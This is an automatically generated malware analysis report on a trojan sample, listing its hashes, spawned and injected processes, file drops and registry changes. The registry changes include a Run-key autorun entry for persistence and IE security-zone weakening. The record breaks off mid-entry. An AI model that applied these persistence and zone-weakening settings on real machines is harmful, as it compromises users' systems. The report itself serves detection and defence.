Trojan.NSIS.StartPage_9f63e8b517

by malwarelabrobot on April 18th, 2014 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Zusy.79781 (B) (Emsisoft), Gen:Variant.Zusy.79781 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 9f63e8b517f9578effb8adbf78bb3dce
SHA1: a60551d80de28799af96aefbc0138bf5abab21f5
SHA256: b934f1c369ae0c65a941476eb56f298ad51aec25832016914b09ddb599d4f418
SSDeep: 6144:sFG/GtASLSFJPOVmbPbn6r/Lu0gh9RGDeAMzRBMDdjg:sUG8JmKD6r/dgTUeAwRBMDdk
Size: 282112 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-01-15 11:06:55
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE:1060
WScript.exe:368
CrashHandler.exe:420
CrashHandler.exe:680
HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE:1648
bfgsetup_s1_l1.exe:1796
%original file name%.exe:1236
reg.exe:1164
reg.exe:620
reg.exe:232
reg.exe:204
reg.exe:1832
reg.exe:508
reg.exe:1352
reg.exe:1292
reg.exe:280
reg.exe:308
reg.exe:1176
reg.exe:996
reg.exe:468
reg.exe:208
reg.exe:1356
reg.exe:1496
reg.exe:964
reg.exe:904
reg.exe:968
reg.exe:2024
reg.exe:644
reg.exe:1100
reg.exe:544
reg.exe:1764

The Trojan injects its code into the following process(es):

Ptype.exe:752
Ptype.exe:1144
bfgsetup_s1_l1.exe:552
HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe:1128

File activity

The process 3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE:1060 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Ptype.exe (3312 bytes)
%Documents and Settings%\%current user%\CrashHandler.exe (81017 bytes)

The process WScript.exe:368 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application DataFilename.exe (601 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\aihgmsvmb.vbs (0 bytes)

The process CrashHandler.exe:420 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_socket.pyd (1960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\select.pyd (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcm90.dll (589 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_hashlib.pyd (2341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\Microsoft.VC90.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\unicodedata.pyd (3821 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\win32api.pyd (706 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcp90.dll (2342 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\triple.exe.manifest (731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\python27.dll (16699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcr90.dll (4448 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_ssl.pyd (6386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\bz2.pyd (1137 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\pywintypes27.dll (1098 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\select.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcr90.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcm90.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_hashlib.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\Microsoft.VC90.CRT.manifest (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcp90.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\win32api.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_ssl.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\triple.exe.manifest (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\python27.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_socket.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\bz2.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\pywintypes27.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\unicodedata.pyd (0 bytes)

The process HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE:1648 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\UserInfo.dll (3 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe (5731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\System.dll (9 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsn1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp (0 bytes)

The process Ptype.exe:752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\aihgmsvmb.vbs (429 bytes)

The process Ptype.exe:1144 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~a21524.log (4 bytes)

The process bfgsetup_s1_l1.exe:1796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsxA.tmp\UserInfo.dll (3 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe (1120371 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxA.tmp\System.dll (9 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxA.tmp (0 bytes)

The process bfgsetup_s1_l1.exe:552 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_en.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_fr.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_es.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_sw.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_de.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_de.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_pt.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_dn.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_it.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_it.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_fr.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_pt.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_en.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_jp.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_es.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\AccessControl.dll (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_dn.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_jp.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_du.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_du.ini (3 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\GameManager\log\gamemanager_install_log.txt (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\uac.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxC.tmp (1178954 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\modern-header.bmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_sw.ini (3 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsxB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp (0 bytes)

The process %original file name%.exe:1236 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE (237 bytes)

The process HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe:1128 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\NSISdl.dll (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S1YHUDA9\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\uac.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\inetc.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IJE9GDOV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S5KLKDKJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\nsProcess.dll (4206 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (36 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe (2998318 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IRCX4XCX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\System.dll (11 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\GameManager\log\gamestub_t_install_log.txt (37602 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bigfishgames[1].txt (318 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\throttle.txt (2 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bigfishgames[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp (0 bytes)

Registry activity

The process 3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE:1060 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 0B 8D 03 68 B4 5A 0A AE 26 A5 56 81 81 7A 40"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%]
"Ptype.exe" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%]
"CrashHandler.exe" = "CrashHandler"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process WScript.exe:368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D6 C0 6E 7E 02 D2 21 AC E0 D6 9B AA FB CF 56 A6"

The process CrashHandler.exe:680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 3E A5 03 6E 9C F1 6A 40 42 98 F6 6C 81 5F E6"

The process HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE:1648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "68 87 A9 4C FA FE 23 FC 8B BE 42 FA 8B 98 B8 5D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process Ptype.exe:752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 02 38 01 4D 04 26 FC 42 0B F9 FA 6B F3 6D 6F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"reg.exe" = "Registry Console Tool"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"wscript.exe" = "Microsoft (R) Windows Based Script Host"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The process Ptype.exe:1144 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 93 6A A4 54 01 E5 34 0B 88 7E C7 D6 AF 63 58"

The process bfgsetup_s1_l1.exe:1796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 B7 99 DE 09 47 4E 44 8E C3 B5 4C 45 06 17 06"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process bfgsetup_s1_l1.exe:552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 47 02 8C 53 40 9E BD 07 14 38 15 C0 8D 1F C6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Big Fish Games]
"Default" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process %original file name%.exe:1236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A 98 2B BC FF 43 3F 2E 76 B7 A1 AD 47 6F 25 D5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE" = "prueba1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process reg.exe:1164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 55 2A E5 B8 82 E4 E2 DF 10 A6 29 1B 61 AF 18"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "1"

The process reg.exe:620 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 87 9B B9 04 C7 59 AE 02 09 58 B2 F1 5C 3F B6"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 5F 52 FA FF 04 8F DD BF D5 E3 FE D2 28 C2 53"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 28 1C 81 18 BD 50 36 49 FD A9 BF 9A 0D 0B A4"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:1832 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A B6 5F 42 F8 CE 0F 6D 9A 58 AC 7E B0 C2 27 35"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:508 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 44 E8 05 43 57 53 92 02 CA 03 5D 58 78 86 9E"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:1352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 77 27 A5 2F F3 C4 27 2E B3 5C 66 03 B9 7A 3F"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:1292 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 ED B5 B6 90 D1 5D AE B3 58 25 25 F1 64 68 27"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 8B E6 D1 78 1B 00 F2 41 1F 91 04 8F 05 25 21"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 BA 54 4F C9 49 A0 2A D9 3A AF 71 DC 56 B3 2D"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:1176 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A C4 76 4F 0B 40 11 5E 7C 64 00 63 A0 71 DF D4"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"

The process reg.exe:996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB D4 B0 6F B1 46 B9 14 99 CE 94 F3 95 84 E6 4C"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

